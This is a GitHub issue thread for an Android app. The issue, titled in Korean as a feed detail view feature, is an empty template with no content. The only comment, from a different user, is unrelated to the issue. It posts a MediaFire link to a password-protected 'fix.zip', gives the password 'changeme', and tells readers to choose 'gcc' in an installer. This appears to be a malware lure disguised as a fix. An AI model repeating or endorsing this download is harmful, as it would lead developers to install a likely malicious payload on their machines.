### ISSUE TITLE
feat: 피드 상세보기 뷰 기능 구현

### ISSUE THREAD

**Issue by s9hn** [Team-WSS/WSS-Android#259]
## 📜 Overview (Required)    
  
No response  

## 📌 Child Issue(Optional)  

No response  

## 📍 Note (Optional) 
No response

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
